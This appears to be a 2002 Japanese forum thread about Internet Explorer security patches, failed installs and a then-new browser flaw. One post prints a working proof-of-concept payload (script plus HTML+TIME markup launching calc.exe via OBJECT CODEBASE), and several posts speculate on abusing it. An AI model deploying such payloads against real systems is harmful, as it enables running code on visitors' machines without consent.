一旦IE6削除してからIE6を新規に入れなおして、MS02-005入れてからやったら、何とかならないんだろうか?

169 :156:02/02/26 23:20
たしかIE5.5で、修正プログラムインストールしましたよ。
今の状態では、完全じゃあ無いのですね?
IE6削除して、やり直します。
アドバイスいろいろありがとうでした。m(__)m


170 :cheshire-cat:02/02/26 23:30
>>169
IE5.5の時の体験だから、IE6で通用するなんて断言できないよ。
でもこれ以外、対処法無いんだろうね。
後々の参考にしたいんで、作業が終わったら報告してほしい。

171 :156:02/02/26 23:36
明日ためしてみますね、やっぱり今の状態で利用してると不具合が発生
するのでしょうか?
初めての経験なので、困りましたがやり直します。
IE6をアンインストロールして、以前のWINDOWSの構成に戻して
IE6を、新にダウンロードすればいいのですね?
時間かかりそうですね、パソコン雑誌の付録にIE6は付いて要るのでしょうか?

172 :cheshire-cat:02/02/26 23:42
>>171
付録CD-ROM、探したけど見つからなかった。
早く作って欲しいね。
毎回DLするのは面倒だし。

173 :156:02/02/26 23:49
私も探しましたが、付属されてないのですね〜知らなかった。
明日すべてやり直します、なぜこんな事がおこったんでしょう?
ネット歴5年ですが、初めてです…


174 :名無しさん@お腹いっぱい。:02/02/27 02:17
IEは現在、マイクロソフトの都合で5.5も6.0も一様に雑誌に掲載されてないね。
たぶん、5.5sp3、6.0sp1等に上がるまで掲載されないんじゃないかな?

どうせすぐまた新しいバグが見つかるんだから、掲載しろよって言いたいんだが。

175 :名無しさん@お腹いっぱい。:02/02/27 08:08
>>174 「常時接続が普及したので雑誌付録掲載はやめた」そうなのでSPが出ようが、
掲載は期待しないほうがいいい。

176 :名無し:02/02/27 11:09
>156と、同じかな?IE5.5SP2で、修正プログラムをDLして、立ち上げたら
IEに破損ファルが、あるためアップグレードに失敗しました、Windowsに戻ります。
結局IEを、アンインストして、再度やり直したのですが、結局上と同じ結果に。
パッチが重複してるから、上手くいかないのではと、言われました。
次にIE6を、DLしたらファイルが破損しててIEは起動しません、又アンストして
IE5.5に戻しました、結局面倒くさくなったし、嫌になったので辞めました。
別に修正プログラム入れなくても、問題ないかも…
マイクロソフト逝ってくれー

177 :名無しさん@お腹いっぱい。:02/02/27 15:52
OEでHTMLを編集して文字を動かしたりする機能が
灰色の画面だけになって全く使えなくなってしまいました。
削除して再インストールしても直りません。ウイルスの感染等も見当りません。
何が原因なんでしょうか。

178 :名無しさん@お腹いっぱい。:02/02/27 15:57
XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
の日本語版パッチが一部リリースされた。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

179 :名無しさん@お腹いっぱい。:02/02/27 16:06
>>178
IE6入れてるんだけどmsxmlというファイルが見つからないんですが
入ってないバージョンもあるんでしょうか?

ファイル名 問題のあるバージョン
msxml2.dll 8.0.6518.1 以降
msxml3.dll 7.50.5108.0 以降
msxml4.dll 4.0.9004.0 以降

180 :名無しさん@お腹いっぱい。:02/02/27 16:23
>>179 c:\windows\system32 か c:\windows\system の中にないか?

181 :名無しさん@お腹いっぱい。:02/02/27 16:57
IE6なんだがQ313675ってどこにあるの?
Q316059は入ってるんだが

182 :名無しさん@お腹いっぱい。:02/02/27 17:46
>>131
もういれちゃったつーの!!
やってくれたなMS

183 :名無しさん@お腹いっぱい。:02/02/27 19:02
>>181
2001年12月13日 Internet Explorer 用の累積的な修正プログラム (MS01-058)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058
「この問題に対する修正は MS02-005 で提供されている累積的な修正プログラムに含まれました。
この問題に対する修正プログラムよりもMS02-005 の修正プログラムを適用することをお勧めします。」
Q316059が入っていればQ313675は不要。2001年12月13日から2002年2月12日の間に
MS01-058が必要だったが、MS-02-005が出た以降は不要。


184 :再々掲:02/02/27 19:08
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

185 :181:02/02/27 21:10
>>183
なるほど。じゃあこれでいいんだね

今の所は


186 :156:02/02/27 21:41
昨日は、アドバイスありがとうございました。
>183を見ると良いみたいですね?

187 :cheshire-cat:02/02/27 21:53
>>186
結局どうなった?

188 :156:02/02/27 23:29
結局、IE5.5に戻して、IE6をDLしたのですが、修正プログラムが、インストール
出来ません?結果は同じでした…
仕方ないので、今の状況で使います。

189 :156:02/02/27 23:29

186です、すいませんm(__)m

190 :cheshire-cat:02/02/28 00:01
>>188
これと似たようなものなんだろうか?
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fisapi%2fgomscom.asp%3fTARGET%3d%2fjapan%2fsupport%2fkb%2farticles%2fJ070%2f1%2f39.asp

191 :名無しさん@お腹いっぱい。:02/02/28 00:12
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009
これが適用されたかどうか確認するにはどうすればいいの?

”サポート技術情報 Q318089 の修正プログラム欄”てどこにあるの

192 :cheshire-cat:02/02/28 00:19
IEのヘルプからバージョン情報を参照。

193 :名無しさん@お腹いっぱい。:02/02/28 09:45
はぁ?

194 :名無しさん@お腹いっぱい。:02/02/28 09:56
>193 態度わりーな。ついでに頭も(w

195 :名無しさん@お腹いっぱい。:02/02/28 19:51
Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る (MS02-009)

この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp

196 :名無しさん@お腹いっぱい。:02/02/28 23:35
>>192
5.50.4807.2300;SP2;Q313675;Q316059;Q318089
のようになるっちゅうことでございますか?

197 :DOWN版DOWN版:02/02/28 23:35
DOWN版
ここで
http://tmp.2ch.net/test/read.cgi/download/1014904195/
祭り中
はやすぎます

198 :名無しさん@お腹いっぱい。:02/02/28 23:36
修正プログラム(MS02-009)が正しくインストールされたか
確認する方法 :

各ファイルを確認するためには、サポート技術情報 Q318089 の
修正プログラム欄を参照して下さい。

だってさ。わがんねー。(;;)

199 :191:02/03/01 05:30
皆さんも困ってるんですね(^^;
どうしたものか、、、

とりあえずバージョン情報のとこには”Q318089”は加わってませんです

200 :名無しさん@お腹いっぱい。:02/03/01 07:16
200get!

201 :名無しさん@お腹いっぱい。:02/03/01 11:03
>>199 パッチ当てたのにQ318089がバージョン情報にないの?変だね。
オレの周りでは、6.0も5.5SP2も当てたものにはQ318089が表示されているが。

202 :201:02/03/01 11:23
スマソ!MS02-005のQ316059と間違えた。Q318089は表示されてませんです。
逝ってくる…

203 :名無しさん@お腹いっぱい。:02/03/01 11:57
オレのIE5.5バージョン情報。
:;SP2;Q306121;Q312461;Q313675;316059

パッチが出ると当てていくって感じで、MS02-009も当ててます。
さぁドコまで伸びるか、バージョン情報!

204 :201:02/03/01 11:59
恥かいたので、調べてきました。
>各ファイルを確認するためには、サポート技術情報 Q318089 の
>修正プログラム欄を参照して下さい。
とは、http://support.microsoft.com/default.aspx?scid=kb;EN-US;q318089
にある、
The English version of the Internet Explorer 6 for Windows 2000 and Windows XP update should have the following file attributes or later:
Date Time Version Size File name
--------------------------------------------------------
06-Jun-2000 15:43 5.50.4134.600 92,432 Advpack.dll
18-Jan-2002 16:31 1,537 Vbs56nen.inf
02-Jan-2002 13:08 5.6.0.7302 467,002 Vbscript.dll
06-Jun-2000 15:43 4.71.704.0 2,272 W95inf16.dll
06-Jun-2000 15:43 4.71.16.0 4,608 W95inf32.dll
The English version of the Internet Explorer 6 for Windows Me, Windows 98, and Windows NT 4.0 update should have the following file attributes or later:
Date Time Version Size File name
--------------------------------------------------------
06-Jun-2000 15:43 5.50.4134.600 92,432 Advpack.dll
16-Jan-2002 15:04 977 Vbs56men.inf
02-Jan-2002 13:08 5.6.0.7302 467,002 Vbscript.dll
06-Jun-2000 15:43 4.71.704.0 2,272 W95inf16.dll
06-Jun-2000 15:43 4.71.16.0 4,608 W95inf32.dll
のことですね。各ファイルが上記のようになっていればMS02-009は当たっている、と。

205 :201:02/03/01 12:20
上記のは英語版で日本語版とファイルに相違がありました。日本語版は↓(2/28リリース)
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp
Windows 2000 および Windows XP update 用の Internet Explorer 6 アップデート (日本語版) は次のとおりです。ただし、これより新しい修正プログラムがリリースされている可能性もあります。
日付 時刻 バージョン サイズ ファイル名
--------------------------------------------------------
2000/06/19 18:00 5.50.4134.600 92,432 Advpack.dll
2002/01/21 11:42 1,608 Vbs56njp.inf
2002/01/02 13:08 5.6.0.7302 467,002 Vbscript.dll
2000/06/06 15:43 4.71.704.0 2,272 W95inf16.dll
2000/06/06 15:43 4.71.16.0 4,608 W95inf32.dll
Windows Me、Windows 98、および Windows NT 4.0 用の Internet Explorer 6 アップデート (日本語版) は、次のとおりです。ただし、これより新しい修正プログラムがリリースされている可能性もあります。
日付 時刻 バージョン サイズ ファイル名
--------------------------------------------------------
2000/06/19 18:00 5.50.4134.600 92,432 Advpack.dll
2002/01/21 11:39 992 Vbs56mjp.inf
2002/01/02 13:08 5.6.0.7302 467,002 Vbscript.dll
2000/06/06 15:43 4.71.704.0 2,272 W95inf16.dll
2000/06/06 15:43 4.71.16.0 4,608 W95inf32.dll

206 :名無しさん@お腹いっぱい。:02/03/01 21:11
パッチが、弾かれてうまくアップデート出来ないのは、何処に苦情言えばいいのかな?
私も、IE6の修正プログラムが、インストール出来ません。
上の方で、同じ症状の人が居たけど、どうにもならなかった見たいですし。
2月14日の、修正プログラムです。


207 :名無しさん@お腹いっぱい。:02/03/01 23:17
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

208 :cheshire-cat:02/03/02 00:36
IE6アンインストールして、IE6→MS02-005→MS02-009を入れてみた。
再現できた。
確かにQ316059のみ。

やらなければよかった。腹立つ。

209 :cheshire-cat:02/03/02 00:53
ええーっと。
1)SystemフォルダからVbscript.dllをどこかに移動させるのと
2)フォルダオプション→ファイルの種類→VBScript Script Fileを削除

どっちがとりあえず(その場しのぎのテクニックとして)、いいんだろうか?

210 :名無しさん@お腹いっぱい。:02/03/02 01:00
updateの重要な更新とIEのパッチは違うものですか?

211 :名無しさん@お腹いっぱい。:02/03/02 01:06
>>210
当てる内容は同じだけど方法が違うだけかと。

212 :cheshire-cat:02/03/02 01:07
>>210
Windows Update使う前にTecnetから拾っちゃうから、知らない。
今度はWindows Updateから拾って試してみるよ。

213 :名無しさん@お腹いっぱい。:02/03/02 01:10
重要な更新・・・OSのセキュリティ改善
IEパッチ・・・IE自体のセキュリティ改善

じゃないんですか?

214 :名無しさん@お腹いっぱい。:02/03/02 01:11
3/1(金) オールデンのUーチップ

今日は、コンフォートなコードヴァンの靴を履きたくなり、久しぶりにUーチップをセレクトしました。
丸みを帯びていて、楽な履き心地なので、長時間履いていても全く疲れません。
この靴は、フランス旅行にも何回か履いて行きましたが、足にピッタリではなくむしろ余裕のある履き心地なので足に優しい靴です。
とにかく、とても心地良いのです。
さらには、汎用性のあるUーチップですし、プランテーションクレープソールと呼ばれるラバーソールなので、使い回しも楽です。
また、コードヴァンの鈍い輝きは、この靴をとてもこだわりのある存在に高めてもいます。
U型のステッチ部分の輝きと、コードヴァン特有の履き皺が、何ともいえない良い雰囲気なのです。
雨跡が残って回復に手間と時間のかかるコードヴァンですが、買った当時は天候にかまわず履いてきました。
黒はオールデンのコードヴァンとこだわっていた時期に買ったので、J.M.ウェストンのゴルフの代役とも考えていたのです。
(もちろん、靴が揃った最近は、最初から雨の場合はさすがに履かなくなりました。)
デザイン的にも、トゥが盛り上がったようにも見えて、ボリュームあるデザインですが、嫌味はなく、全体コーディネートの中では程よいアクセントにもなります。
特に、ジーンズ、綿パンなどのラフなボトムズとの相性は、とてもいいです。
アメリカでは売っていないとのことですので、日本で買うオールデンの靴としては、ベターな靴と思います。



215 :名無しさん@お腹いっぱい。:02/03/02 01:12
ここってつまんねー所だな、カキコがすくね〜しよ

216 :cheshire-cat:02/03/02 01:13
>>213
同じものだったりする。
でもたまに、Windows Updateに載るのが数日遅かったりする。

217 :名無しさん@お腹いっぱい。:02/03/02 01:14
>>216
なるほど当てるときはどっちかでいいと

218 :cheshire-cat:02/03/02 01:17
>>217
最近気になるんだけど。
Windows Updateってパッチの順番とか、ちゃんと見てくれてるのかな?
そうならWindows Updateの方がいいんだろうけど。
誰か知らないかな〜

219 :名無しさん@お腹いっぱい。:02/03/02 08:50
普段はオペラ使ってるんだけど、たまにジャパスクリプトのぺえじ見るため
IEを開いたりする。
そーすっと、ノートン先生がレッドカード出す。
見ると、バックドアトロイの木馬がやってきてたぞ、というレポート。
IEはまめにパッチあててるのにぃ。。。。

220 :名無しさん@お腹いっぱい。:02/03/02 09:27
みんなおかしい
2002年3月1日(金) 晴れ
今日は既に午前様なので早々に終わりますが一言。
しんのすけさん、やそすけさん、今日は一体どうしたんですか?


221 :名無しさん@お腹いっぱい。:02/03/02 10:24
致命的欠陥が判明

http://archives.neohapsis.com/archives/bugtraq/2002-02/0354.html

任意のコマンドが実行できてしまいます。HDDのフォーマットも可能です。

パッチが出来るまで、IE使わない方が無難です。

http://security.greymagic.com/adv/gm001-ie/simplebind.html

にアクセスするだけで、c:/winnt/system32/calc.exe が起動するよ。

222 :名無しさん@お腹いっぱい。:02/03/02 10:43
>>221
実行可能ファイルにコマンドライン引数を渡せないから、
HDDのフォーマットもウィルスを仕込むこともできないよ。
高性能なブラクラに利用できるくらいで、極めて安全。

223 :名無しさん@お腹いっぱい。:02/03/02 11:58
>>222
例えばdataアトリビュート指定するとそっからダウンロード試みているようだ。
極めて安全はいいすぎ。


224 :名無しさん@お腹いっぱい。:02/03/02 13:44
IE6.5が、出そげ。

225 :ニュースリリース:02/03/02 14:31
ニュースリリース
弊社の販売しているPCに搭載していたMSのIEですが、あまりの問題の多さに弊社も辟易しました。
この度、ユーザの皆様にはとてもお勧めできるものではないと弊社は判断いたしましたので、
IE以外のブラウザをお使いください。

226 :名無しさん@お腹いっぱい。:02/03/02 14:39
>>225
/.jpからのコピペ

227 :名無しさん@お腹いっぱい。:02/03/02 15:46
【新たなセキュリティホール発覚】
この事実、どう説明してくれる! MS!!
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie
>IE 5.5 SP2 / 6、OutlookExpress 5.5 / 6 に超巨大な弱点。
>アクティブスクリプトおよび ActiveX を無効にした場合においても、
>悪意ある web サイトや HTML メール送信者が任意のコマンドを実行可能。
>回避方法はない。Microsoft から fix が提供されるまで、IE 5.5 / 6 を使わず
>Netscape 6 や Opera 6 などを利用すること。

228 :名無しさん@お腹いっぱい。:02/03/02 15:58
>>227
せめて表示されてる分だけでも読んでから書いてくれ。

229 :名無しさん@お腹いっぱい。:02/03/02 16:15
大発見をしたと思って急いで書き込んだんだろうな

230 :名無しさん@お腹いっぱい。:02/03/02 16:16
余りに無様

231 :名無しさん@お腹いっぱい。:02/03/02 16:49
充分に大した弱点だが何か?

232 :親切な人:02/03/02 16:53

ヤフーオークションで、凄い人気商品、発見!!!

「 TBC-7 」がパワーアップした
「 TBC-7S 」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b21029050

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。

233 :名無しさん@お腹いっぱい。:02/03/02 17:41
IE6のService Pack1ってあるの?

234 :名無しさん@お腹いっぱい。:02/03/02 17:47
無無

235 :名無しさん@お腹いっぱい。:02/03/02 18:11
>>231 大した弱点かどうかは問題ではない。カキコの基本。

236 :名無しさん@お腹いっぱい。:02/03/02 21:30
>>233
立て続けに脆弱性が見つかりいちいち対処しなくちゃならないため
いつまでたっても腰すえてまとめる事が出来ないと思われ。

237 :cheshire-cat:02/03/02 21:37
質問。
みんなVisual Basic ScriptとWindows Scripting Hostをはずしているよね、当然。
他にもチェックする項目ってあるかな?

238 :名無しさん@お腹いっぱい。:02/03/02 23:24
サポセンに「修正プログラムが、インスト出来ないのですが…」と、問い合わせ
した所「セキュリティソフト導入して置けば、問題ないですよ」と言われた…
いいのか…?

239 :名無しさん@お腹いっぱい。:02/03/02 23:24
マイクロソフト(株)は22日、
“Internet Explorer の不正な VBScript 処理により Web ページがローカルファイルを読み取る”
というセキュリティ問題の修正プログラムを公開した。
対象となるのは、Internet Exploerer 5.01/5.5/6で、
同社ではこの問題の危険性を“高”レベルに設定して警戒を呼びかけている。

http://www.forest.impress.co.jp/article/2002/02/22/iepatch.html
http://www.microsoft.com/japan/technet/security/bulletin/MS02-009ov.asp


240 :名無しさん@お腹いっぱい。:02/03/03 01:17
>>237
はずしてない

241 :名無しさん@お腹いっぱい。:02/03/03 01:24
>237
そこまでして使わなくてはならないもんなんだろか。

オペラとネスケを使い分ければいいような。

242 :名無しさん@お腹いっぱい。:02/03/03 01:28
>>235
(゚д゚)ハァ?
bugtraq archives
http://archives.neohapsis.com/archives/bugtraq/2002-02/0354.html 見ろや

ここ↓のデモやったら血の気が引くぞ
http://security.greymagic.com/adv/gm001-ie/
最新パッチ当ててようが何してようが、Webを見ただけ、HTMLメールを表示しただけで
HDフォーマットから何でもありあり。
使い続けるのはあんたの勝手だけどさ。


243 :名無しさん@お腹いっぱい。:02/03/03 01:46
>>242
http://pc.2ch.net/test/read.cgi/sec/1005605775/221-223
くらい読んでから書け。つーか素人はROMってろ。ウザイ

244 :名無しさん@お腹いっぱい。:02/03/03 01:48
>>242
ばか

245 :名無しさん@お腹いっぱい。:02/03/03 01:52
>>242
ネタだと思ったら真性だったのか
過去ログを一通り読んでから書き込むってーのは初心者以前の常識だと思うが・・・

246 :名無しさん@お腹いっぱい。:02/03/03 01:53
で、結局これを悪用されたとするとどんなシナリオが考えられるんだろう?

247 :名無しさん@お腹いっぱい。:02/03/03 01:55
まぁそんなに虐めてやるなよ
素人がちょっとはしゃいでしまっただけだろ

248 :名無しさん@お腹いっぱい。:02/03/03 01:59
>>246
別にたいしたことは起きない

つーか有る意味自業自得?


249 :名無しさん@お腹いっぱい。:02/03/03 02:00
>>248
なにが?

悪用されてひっかかる

250 :名無しさん@お腹いっぱい。:02/03/03 02:01
>>246
242の血の気を引かせる (w

251 :名無しさん@お腹いっぱい。:02/03/03 02:17
誰か
C:\Program Files\Adobe\Photoshop 6.0\Photoshp.exe
を仕込んでみて。起動時間かかりまくり。

252 :名無しさん@お腹いっぱい。:02/03/03 06:23
ココで、こんなの対したことないって言っている奴らって
セキュリティに、とことん知識がないか 関心がない奴らなんだろうなぁ
もし、少しでそ知識or関心があれば
このセキュリティホールの恐ろしさが、イヤでも判るもんだが・・・

253 :名無しさん@お腹いっぱい。:02/03/03 06:50
俺のUG専用マシンには個人情報はかけらも存在しないけど・・・。

254 :名無しさん@お腹いっぱい。:02/03/03 09:32
>>252 == >>242
誰に騙されたか知らんが、HDDフォーマットし放題とやらのソース出してみろ。
所詮、素人の妄想なのでだせるはずもないだろうが。


255 :名無しさん@お腹いっぱい。:02/03/03 10:05
>>254
スクリプトだけならできないだろうけど、
ActiveX利用されたらどうだろうか?

256 : :02/03/03 12:30
てゆーか、IE以外を使える人はとうに使ってると思われ。
せきゅりていに関心がある人自体が少数だし。
世間的には「大事なデータのバックアップがあれば平気」ていどの認識だろう。
その大部分は「スクリプトって何?」というレベルだし。議論しても無駄。

257 :名無しさん@お腹いっぱい。:02/03/03 12:36
http://slashdot.jp/article.pl?sid=02/03/02/0236229&mode=thread
参考になるかどうかはわからんけど。

つか、どの程度のことができるかは知らないけど、オフにしてても
スクリプトを実行されるとしたら、どのみちあまり好ましいことでは
ないのでは。いまさらこの程度の穴では驚かないということなのかも
知れないけど。

258 :名無しさん@お腹いっぱい。:02/03/03 13:35
>>257
その記事の内容は間違ってるよ。
大手のサイトの記事だからといって、過信しない方がいい。

259 :名無しさん@お腹いっぱい。:02/03/03 13:38
>>252
負け惜しみかよ
ダボがッ!

知ったか素人は無様だね

この程度は穴でもなんでもないよ。

260 :名無しさん@お腹いっぱい。:02/03/03 13:40
つーかさ
HDD初期化されるのがそんなに怖いことなのか?
30分も有れば完全に復帰できるだろ?
まぁそんなことは起こりようがないが・・・

261 :名無しさん@お腹いっぱい。:02/03/03 13:44
自作自演スレはここですか?

262 :名無しさん@お腹いっぱい。:02/03/03 13:47
みんな俺を信じろって。安全だから。

263 :名無しさん@お腹いっぱい。:02/03/03 13:51
>>260
激しく同意。フォーマットされてもエロ画像消えるぐらいだろ?(w

264 :名無しさん@お腹いっぱい。:02/03/03 14:06
まあ、素人はせいぜいびびってなさいってこった。

265 :名無しさん@お腹いっぱい。:02/03/03 15:23
>264
おまえら、ブタオタもウザイがな(藁
社会的不適各のブタヒッキーが

266 :名無しさん@お腹いっぱい。:02/03/03 15:28
>>265
意味不明
つーか煽り下手。TPOを考えよう

267 :不適各だって プッ:02/03/03 15:35
>>265
漢字の書き取りも出来ないガキに指摘されなくても、俺らが社会的に不適格という事は認識してるよ。


268 :名無しさん@お腹いっぱい。:02/03/03 15:39
書き込みが増えたら糞スレになったな…

269 :名無しさん@お腹いっぱい。:02/03/03 15:47
まぁ227の厨のせいだけどな

ナンチャクンだし

270 :名無しさん@お腹いっぱい。:02/03/03 16:03
俺はこれからも安心してIEでアングラサイトいきまくるYO!

271 :名無しさん@お腹いっぱい。:02/03/03 16:09
>>270
エロ画像消えるぞ(藁

272 :名無しさん@お腹いっぱい。:02/03/03 16:16
トラップを使って>>227のパソコンに、
あるものを仕掛けました。

273 :名無しさん@お腹いっぱい。:02/03/03 16:21
HD 初期化は(間違いらしいけど)例として挙げてるだけじゃない?
バックドアを仕掛けられるとか踏み台にされるとかの心配はないのかな。
あとこれを利用して、本来なら防げるはずのワームにやられるとか。
教えて、えらい人。

274 :名無しさん@お腹いっぱい。:02/03/03 17:14
動かしてないはずのIISが動いてるかも知れんなぁ。


275 :名無しさん@お腹いっぱい。:02/03/03 18:18
このパソコンはネット専用だし98だし

それほど問題視してないよ

276 :名無しさん@お腹いっぱい。:02/03/03 22:38
>>273
そーゆー危険なことはできません。

277 :名無しさん@お腹いっぱい。:02/03/04 01:12
悪意ある272の頭の中に重大なセキュリティホールを発見!

278 :235:02/03/04 01:30
あーなんか糞スレになってる。
おいらが>>227くんに「激しくキシュツですよ」って
親切に教えてあげればよかったよ。ごめんね。

279 :名無しさん@お腹いっぱい。:02/03/04 01:54
まぁたいして変わらんよ

ヤシも弄られて本望だろうし

280 :名無しさん@お腹いっぱい。:02/03/04 02:36
制限ユーザーで使ってるので問題なし。デモも動かず。

281 :名無しさん@お腹いっぱい。:02/03/04 12:44
IE5.5だけど、IE6にしない方が良いみたいですね〜
付録待ちだったけど、付かないみたいだし…


282 :IEの最新パッチ(再掲):02/03/04 13:07
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

283 :名無しさん@お腹いっぱい。:02/03/04 14:07
>>281
6の方がまだ安全

まぁ好きにすればいいが

284 : :02/03/04 14:33
で、結局たいしたセキュリティホールじゃないのか。
引数を与えられないからCドライブをフォーマットなんてことはできないのね。

285 :名無しさん@お腹いっぱい。:02/03/04 14:52
んー、でも、パスが既知のuninstaller.exeを起動ぐらいだったらできるよね。

286 : :02/03/04 15:13
なるほど・・・
面白いかも。
htmlメールをoutlookで開いた瞬間にアンインストールなんてことが可能なワケね。

287 :名無しさん@お腹いっぱい。:02/03/04 15:20
だからActiveXコントロールをダウンロードさせればなんでもありだっつうの。
MSの工作員でも紛れこんでんのか?

288 :名無しさん@お腹いっぱい。:02/03/04 15:22
あの〜、282のパッチは順番通りに入れないとまずいんでしょうか?
過去記事読むとうまくインストール出来ない方とかいるようなのですが…。
数字が小さい順に入れるのが(005→008→009)基本ですか?

289 :名無しさん@お腹いっぱい。:02/03/04 15:31
道理で最近HDDへのアクセスが多かった訳か

290 :名無しさん@お腹いっぱい。:02/03/04 15:42
MSXML4かわからんからMSXML入れて修正パッチ入れるか

291 :名無しさん@お腹いっぱい。:02/03/04 16:04
しかし大半はネタだろうが、もしかしてマジびびってるヤシも中にはいるのだろうか?
初心者は別として

292 :名無しさん@お腹いっぱい。:02/03/04 16:09
>>288 数字が小さい順(パッチのリリースが古い順)に入れる。

293 :名無しさん@お腹いっぱい。:02/03/04 16:31
290の方法でもやっておけば大丈夫

294 :名無しさん@お腹いっぱい。:02/03/04 18:25
>>287
だからどうやってダウンロードさせるの?
はじめから任意のActiveXのダウンロード実行できる環境なら
こんなセキュリティホール無くても、元々なんでもできるでしょ?

295 :名無しさん@お腹いっぱい。:02/03/04 18:55
回避方法が追加されたみたい
http://memo.st.ryukoku.ac.jp/archive/200203.month/3105.html

296 :名無しさん@お腹いっぱい。:02/03/04 23:20
>>281
OCNのCD-ROMに、付録で6.0は去年から付いているが。

297 :名無しさん@お腹いっぱい。:02/03/05 00:55
>>296
それはOCNに請求しないと駄目なのか?

298 : :02/03/05 04:04
<script id="scr1">
var oPopup = window.createPopup();
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111
-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:
11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/system32/calc.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
</script>


<noscript>
<xml:namespace prefix="t" />
<?import namespace="t" implementation="#default#time2" />
<t:set id="set1" to="" attributeName="document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML" />
</noscript>

299 :名無しさん@お腹いっぱい。:02/03/05 07:13
>>297
淀橋や山田に行きゃある。

300 :名無しさん@お腹いっぱい。:02/03/05 08:17
IE使いって脳死してるのか?

301 :名無しさん@お腹いっぱい。:02/03/05 08:37
脳死常態の奴はIEすら使えませんがな

302 :名無しさん@お腹いっぱい。:02/03/05 09:34
きさまーーーーーーーーーー

303 :名無しさん@お腹いっぱい。:02/03/05 09:42
>>296 OCNに配布許可だすなら、雑誌にも許可してあげればいいのに。M$のバカめ。


304 :名無しさん@お腹いっぱい。:02/03/05 10:35
ODNにも、付いてたよ〜
付属の用紙に、インストしたら直にアプデートして下さいと書いてあった。

305 :名無しさん@お腹いっぱい。:02/03/05 10:40
>>304 IEの画面のどこかにプロバイダの表示が入ってない?

306 :名無しさん@お腹いっぱい。:02/03/05 11:08
>>296 OCNってBadtrans撒き散らし率高いなって思ってたら、
ISPがIEを配布してるのか〜。パッチ当てまできちんと指導してくれ。

307 :MS02-013:02/03/05 12:53
Java アプレットがブラウザ トラフィックをリダイレクトする
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
この問題により、ブラウザで送受信される情報を盗聴されることがございます。

308 :名無しさん@お腹いっぱい。:02/03/05 13:15
>>307
別に、盗まれたっていいじゃん

309 :名無しさん@お腹いっぱい。:02/03/05 13:21
>>307
さっそくパッチ当てたがパッチというよりは最新のMicrosoft virtual machine
だね。5MBもある。

310 :名無しさん@お腹いっぱい。:02/03/05 13:25
>281
むしろIE5.01SP2の方が安全かも


311 :名無しさん@お腹いっぱい。:02/03/05 13:39
>>310 Win2000しか最新パッチでてないけどね。

312 :名無しさん@お腹いっぱい。:02/03/05 14:11
今日ヨドバシ行ってOCNの入会案内貰って来たけど、
IE6入ってるね。

313 :名無しさん@お腹いっぱい。:02/03/05 17:41
IE6にアップデートしてバッチq313675をいれた所
とにかくフリーズする回数が増えてしまいました。
何故でしょう?

314 :名無しさん@お腹いっぱい。:02/03/05 17:48
>>313 メモリ足りてる?

315 :名無しさん@お腹いっぱい。:02/03/05 18:23
http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008
ここ見て調べて見たらmsxml3.dllだった。でもこのヴァージョンのパッチは
準備中になってる、駄目じゃん。

316 :名無しさん@お腹いっぱい。:02/03/05 18:27
IE6はMSXML3.0のようだね
http://www.keiyu.com/doc/msxml.htm

317 :名無しさん@お腹いっぱい。:02/03/05 18:29
>>313
q316059.exeも入れよう

318 :IEの最新パッチ:02/03/05 19:13
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする(MS02-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

319 :名無しさん@お腹いっぱい。:02/03/05 19:23
MSXML3.0の場合はMSXML4.0にヴァージョンアップしても
問題ないんだろか?

